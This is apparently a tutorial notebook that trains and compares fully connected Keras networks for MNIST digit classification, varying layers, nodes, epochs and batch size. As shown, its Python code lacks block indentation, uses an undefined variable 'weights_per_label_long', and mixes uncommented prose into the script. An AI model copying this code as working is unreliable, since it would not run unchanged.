loss, accuracy = model.evaluate(x_test, y_test, verbose=False)
print(f'Test loss: {loss:.3}')
print(f'Test accuracy: {accuracy:.3}')
# -
# We do not know exactly what the network learns about each digit: the pixels of the
# same digit can vary widely between examples. But for a single-layer network we can
# visualize the weights to see what the network has learned.
#
# Each output node has a weight coming from every pixel. For example, the "is it a 2?"
# output node has 784 input weights, one per pixel. A large positive weight means the
# model treats that pixel as strong evidence for the digit 2; a strongly negative
# weight means the model treats that pixel as evidence against it. So if we take the
# vector of weights feeding an output node and reshape it back to a 28x28 image, we
# can "see" what the network learned for that digit.
from matplotlib import cm
output_weights = out_layer.get_weights()
arr = np.array(output_weights[0])
w = np.transpose(arr)
weights_per_label = w.tolist()
cmp = cm.get_cmap("Dark2_r", 10)
for i in range(len(weights_per_label)):
a = np.array(weights_per_label[i])
pixels = np.reshape(a, (28, 28))
ax = plt.subplot(2, 5, i+1)
ax.axis('off')
plt.imshow(pixels, interpolation='bilinear',cmap=cmp)
plt.colorbar()
for i in range(len(weights_per_label_long)):
a = np.array(weights_per_label_long[i])
pixels = np.reshape(a, (28, 28))
ax = plt.subplot(2, 5, i+1)
ax.axis('off')
plt.imshow(pixels, interpolation='bilinear', cmap=cmp)
# + [markdown] id="UkCoJlsjqLaM"
# ## 4. Adding one hidden layer
#
# Here is a first simple network for MNIST: it has a single hidden layer with 32 nodes.
# +
model = Sequential()
# The input layer requires the special input_shape parameter which should match
# the shape of our training data.
model.add(Dense(units=32, activation='sigmoid', input_shape=(image_size,)))
model.add(Dense(units=num_classes, activation='softmax'))
model.summary()
# -
model.compile(optimizer="sgd", loss='categorical_crossentropy', metrics=['accuracy'])
history = model.fit(x_train, y_train, batch_size=128, epochs=10, verbose=False, validation_data=(x_test, y_test))
# history.history
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('model loss function')
plt.ylabel('loss (error)')
plt.xlabel('epoch')
plt.legend(['training', 'validation'], loc='best')
plt.show()
loss, accuracy = model.evaluate(x_test, y_test, verbose=False)
print(f'Test loss: {loss:.3}')
print(f'Test accuracy: {accuracy:.3}')
# + [markdown] id="ARsdbx5hqLah"
# ## 5. Preparing to run experiments
#
# There are a couple of things we're going to do repeatedly in this notebook:
#
# * Build a model, and
# * Evaluate that model.
#
# These two functions will save us a bit of boilerplate, and they help us compare "apples to apples" -- when we call `create_dense` and `evaluate`, our models and training regimen use the same hyperparameters. Both use some of the variables declared above, and both are therefore explicitly intended for working with the MNIST dataset.
#
# `create_dense` accepts a list of layer sizes and returns a Keras model of a fully connected neural network with the specified hidden-layer sizes. `create_dense([32, 64, 128])` returns a network with three hidden layers: the first with 32 nodes, the second with 64, and the third with 128.
#
# `create_dense` uses the `image_size` variable declared above, which means it assumes the input data will be a vector of length 784. All the hidden layers use the sigmoid activation function; the output layer uses softmax.
#
# `evaluate` compiles and trains the model, then prints the test loss and accuracy. By default it runs 10 training epochs with a batch size of 128, holding out 10% of the training data for validation, and it uses the MNIST data we processed above.
# + id="tP4mxCmLqLai"
def create_dense(layer_sizes):
model = Sequential()
model.add(Dense(layer_sizes[0], activation='sigmoid', input_shape=(image_size,)))
for s in layer_sizes[1:]:
model.add(Dense(units = s, activation = 'sigmoid'))
model.add(Dense(units=num_classes, activation='softmax'))
return model
def evaluate(model, batch_size=128, epochs=10, title="", plot=True):
print(title)
model.compile(optimizer='sgd', loss='categorical_crossentropy', metrics=['accuracy'])
history = model.fit(x_train, y_train, batch_size=batch_size, epochs=epochs, validation_split=.1, verbose=False)
loss, accuracy = model.evaluate(x_test, y_test, verbose=False)
if plot:
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('model loss function')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['training', 'validation'], loc='best')
plt.show()
print()
print(f'Test loss: {loss:.3}')
print(f'Test accuracy: {accuracy:.3}')
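As a sanity check on the `model.summary()` output these experiments produce, the parameter count of a fully connected stack can be computed by hand: a dense layer with `n_in` inputs and `n_out` units has `n_in * n_out` weights plus `n_out` biases. A small sketch (the helper name `dense_param_count` is ours, not part of Keras):

```python
def dense_param_count(layer_sizes, n_inputs=784, n_outputs=10):
    """Total trainable parameters of a fully connected net built like create_dense."""
    total = 0
    prev = n_inputs
    for size in list(layer_sizes) + [n_outputs]:
        total += prev * size + size  # weights + biases for this layer
        prev = size
    return total

print(dense_param_count([32]))      # single 32-node hidden layer
print(dense_param_count([32, 32]))  # two hidden layers
```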
# + [markdown] id="BWAIlFjKqLam"
# ## 6. Comparing different architectures
# ### 6.1. Number of hidden layers
#
# The following code trains and evaluates models with different numbers of hidden layers. All the hidden layers have 32 nodes. The first model has 1 hidden layer, the second has 2, and so on up to 4 hidden layers.
#
# + colab={"base_uri": "https://localhost:8080/", "height": 2634} id="ySDBNtbHqLao" outputId="08cf946b-b944-4929-8540-cea11c990307"
for layers in range(1, 5):
model = create_dense([32] * layers)
evaluate(model, title="# of hidden layers = {}".format(layers), plot=False)
print("=============================")
print()
# + [markdown] id="lVhUrkcAsF95"
# ### 6.2. Deeper networks need more epochs
#
# One of the factors at play above is that deeper networks take more time to train. This has to do with backpropagation, gradient descent, and the way optimization algorithms work -- those details are beyond the scope of this notebook, but consider what happens when we let the 3-layer network that had mediocre performance above train for longer.
# + colab={"base_uri": "https://localhost:8080/", "height": 689} id="JuhHqjWQsklA" outputId="c1bae770-09ea-4077-a897-128b9726b5c6"
model = create_dense([32, 32, 32])
evaluate(model, epochs=100, plot=False)
# + [markdown] id="4H6Bqkh1qLaw"
# ### 6.3. Number of nodes per layer
#
# Another way to add complexity is to add more nodes to each hidden layer. The following code creates several single layer neural networks, with increasingly more nodes in that layer.
# + colab={"base_uri": "https://localhost:8080/", "height": 4232} id="c9vC67yfqLaz" outputId="f5ed8075-739f-4dff-d4c7-9d45ef146f62"
for nodes in [32, 64, 128, 256, 512, 1024, 2048]:
model = create_dense([nodes])
evaluate(model, epochs=10, plot=False, title="# of nodes in the hidden layer = {}".format(nodes))
print("=============================")
print()
# + [markdown] id="T_esBBNpqLa7"
# ### 6.4. More layers and more nodes per layer
#
# Now that we've looked at the number of nodes and the number of layers in isolation, let's look at what happens when we combine these two factors.
# + colab={"base_uri": "https://localhost:8080/", "height": 3375} id="dkEcWw05qLa-" outputId="02c279d9-783e-4eb2-89c5-3c9de7d5c89f"
nodes_per_layer = 32
for layers in [1, 2, 3, 4, 5]:
model = create_dense([nodes_per_layer] * layers)
evaluate(model, epochs=10*layers, plot=False,
title="# of hidden layers = {} with {} nodes per layer and {} epochs".format(layers,nodes_per_layer, 10*layers))
print("=============================")
print()
# + colab={"base_uri": "https://localhost:8080/", "height": 3375} id="kYuxXcWCqLbH" outputId="2b505072-36c1-42ba-b24d-e48b4aba5f89"
nodes_per_layer = 128
for layers in [1, 2, 3, 4, 5]:
model = create_dense([nodes_per_layer] * layers)
evaluate(model, epochs=10*layers, plot=False,
title="# of hidden layers = {} with {} nodes per layer and {} epochs".format(layers,nodes_per_layer, 10*layers))
print("=============================")
print()
# + colab={"base_uri": "https://localhost:8080/", "height": 3375} id="s54vh7IbqLbO" outputId="3f0a6505-9ac8-4365-f869-f0ed2924d23a"
nodes_per_layer = 512
for layers in [1, 2, 3, 4, 5]:
model = create_dense([nodes_per_layer] * layers)
evaluate(model, epochs=10*layers, plot=False,
title="# of hidden layers = {} with {} nodes per layer and {} epochs".format(layers,nodes_per_layer, 10*layers))
print("=============================")
print()
# + [markdown] id="MJKZhbJws1zU"
# ## 7. Smaller batches
#
# Models with several layers sometimes need not only to train for longer, but also to receive more corrections per epoch. Decreasing the batch size increases the number of weight updates the model gets per epoch, and each update is based on the error over a smaller, more fine-grained batch.
#
# In this case, we can force a model that did not learn well in previous experiments to achieve a moderately respectable accuracy. The performance is still not great, but it's worth noting that with patience and computational power we can make a model that looked like total junk perform decently.
#
# Still, our effort would probably be better spent on more promising models.
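The "more corrections per epoch" point is simple arithmetic: the number of gradient updates per epoch is the number of batches, roughly the training-set size divided by the batch size. A quick sketch (using the 60,000-image MNIST training set; `evaluate` actually holds out 10% for validation, so the real counts are slightly lower):

```python
import math

def updates_per_epoch(n_samples, batch_size):
    """Number of gradient updates (batches) per training epoch."""
    return math.ceil(n_samples / batch_size)

for batch_size in (128, 16):
    print(batch_size, updates_per_epoch(60_000, batch_size))
```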
# + colab={"base_uri": "https://localhost:8080/", "height": 758} id="ICl_MQiJsOHa" outputId="151eeb9e-3706-4292-bdf4-843b75b434bc"
model = create_dense([128] * 5)
evaluate(model, batch_size=16, epochs=50, plot=False)
# + [markdown] id="NlyjS73u-J-D"
# ## 8. Best single-layer network with smaller batches
# -
model = create_dense([2048] * 1)
evaluate(model, batch_size=16, epochs=10, plot=True)
handwriting_classification.ipynb